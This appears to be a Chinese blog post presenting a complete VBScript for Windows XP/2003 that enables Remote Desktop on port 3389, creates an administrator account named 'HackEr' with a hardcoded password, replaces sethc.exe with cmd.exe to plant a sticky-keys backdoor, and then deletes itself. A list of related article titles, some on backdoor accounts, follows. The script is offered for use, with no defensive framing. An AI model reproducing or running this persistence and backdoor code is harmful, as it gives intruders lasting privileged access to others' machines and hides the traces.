xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
2018-10-12 14:13
671 查看
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
相关文章推荐
- 可自删除 开启3389创建用户粘滞键后门的vbs
- Windows 2003隐藏用户(匿名后门账户)怎么发现,创建及删除
- sybase用户管理(创建、授权、删除)
- Linux-Shell脚本学习心得之批量创建、删除用户
- linux创建 / 删除用户及用户管理
- 用户管理脚本之删除用户――Delete_user.sh
- windows server 2003 创建和管理用户帐户
- linux用户管理(1)----创建用户(adduser和useradd)和删除用户(userdel)
- PostgreSQL简介、安装、用户管理、启动关闭、创建删除数据库
- 用户/组管理(2)——创建、更改、删除用户/组的命令总结
- ORACLE中的用户管理、创建、删除和查询
- linux用户管理(1)----创建用户(adduser和useradd)和删除用户(userdel)
- oracle学习笔记一:用户管理(2)创建删除用户
- Windows Server 2003 创建和管理用户帐户
- 用户管理(二):使用shell脚本批量删除除root用户以外的其它用户
- mysql用户管理(account management)创建/删除/权限配置
- linux之脚本管理完全删除用户账号的脚本
- linux创建 / 删除用户及用户管理
- 一个自己写的自动格式化,开机挂载,创建用户和管理ACL权限的shell脚本
- 2003系统管理实战 创建DC 管理用户 备份 批量安装